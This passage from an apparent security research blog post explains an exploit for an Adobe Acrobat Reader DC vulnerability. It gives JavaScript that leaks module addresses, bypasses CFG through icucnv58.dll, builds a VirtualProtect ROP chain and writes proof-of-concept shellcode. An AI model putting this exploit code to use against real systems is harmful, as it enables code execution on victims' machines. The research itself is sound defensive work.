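console.log(toRelativeOffset(0x10000000, base).toString(16)); // cffeffa8

// Adding the offset back to the base, modulo 2^32, recovers the absolute address.
const wrapped = (base + toRelativeOffset(0x10000000, base)) % 0x100000000;
console.log(wrapped.toString(16)); // 10000000
```

Addresses below the buffer are reached by letting the offset wrap past 0xffffffff, which is only possible because the corrupted byteLength covers the whole 32-bit range.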

Writing and Executing the ROP Chain

The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules. CFG forbids redirecting the execution flow via pointer overwrite to arbitrary addresses.

One way of bypassing the CFG restrictions is to redirect the execution flow to a module that was not built with CFG enabled. Adobe Acrobat Reader DC ships with some modules that do not have CFG enabled. The most convenient one for the current exploit is icucnv58.dll. Its large size (plenty of options for ROP gadgets) and the fact that it gets loaded at runtime if text fields are used (this module offers functions to handle Unicode data) make it a perfect candidate.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following code implements the mentioned strategy:

function writePayload(dv) {

[1]

    var escriptAddrDelta = 0x275528;
    var fakeArrObjElementsPtr = readUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0xC);
    var escriptBaseAddr = readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0xc) - escriptAddrDelta;

[2]

    var acroFormAddrDelta = 0x2827d0;
    var acroFormBaseAddr = readUint32(dv, readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0x10)+0x34) - acroFormAddrDelta;

[3]

    var icucnv58AddrDelta = 0xc3ad8c;
    var icucnv58BaseAddr = readUint32(dv, readUint32(dv, acroFormBaseAddr+icucnv58AddrDelta)+0x10);

[4]

    var kernel32BaseAddr = readUint32(dv, escriptBaseAddr+0x273ED0);

[5]

    // Stack pivot
    //    0x95907: mov esp, 0x59000008; ret;
    var stackPivot = icucnv58BaseAddr+0x95907;

[6]

    var virtualProtectStubDelta = 0x20420;
    writeUint32(dv, 0x59000008, kernel32BaseAddr+virtualProtectStubDelta);

[7]

    // VirtualProtect parameters
    writeUint32(dv, 0x59000008+4, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+8, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+12, SHELLCODE_BUFFER_SZ);
    writeUint32(dv, 0x59000008+16, 0x40);
    writeUint32(dv, 0x59000008+20, fakeArrObjElementsPtr+0x8);

    // Write the shellcode
    shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
    0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
    0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
    0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
    0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
    0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x00000000]

[8]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(dv, SHELLCODE_ADDR+i*4, shellcode[i]);
    }

[9]

    // Overwrite the fake array ArrayObject.type_.classp.enumerate pointer to achieve EIP control
    writeUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10+0x1c, stackPivot);
}

In the code listing above, at [1], [2], [3], and [4] the base addresses of the EScript.api, AcroForm.api, icucnv58.dll, and Kernel32.dll modules are obtained. At [5] the address of the stack pivot gadget is calculated. The function pointer selected to hijack the execution flow does not allow controlling any other CPU register, so the stack pivot gadget selected (mov esp, 0x59000008; ret) relocates the stack to 0x59000008, where the address of the VirtualProtect function [6] and the parameters passed to it are written [7]. Finally, the shellcode is written [8] and the fake Array object internal pointer ArrayObject.type_.classp.enumerate is overwritten with the address of the stack pivot gadget [9].

The last step is to trigger the execution of the ROP chain by assigning a value to a nonexistent property of the fake Array object. This calls the internal enumerate function, which is expected to define all the lazy properties not yet reflected in the object. This can be done with the following line of code:

fakeArrObj.triggerRopchain = 2;

Conclusion

Adobe patched this vulnerability in August 2020. However, it is likely that more vulnerabilities of this nature will continue to pop up in Adobe Reader given its large attack surface. We hope you enjoyed reading our analysis and learned something new. Be sure to check out our other blog posts, such as Firefox vulnerability research and patch-gapping Chrome.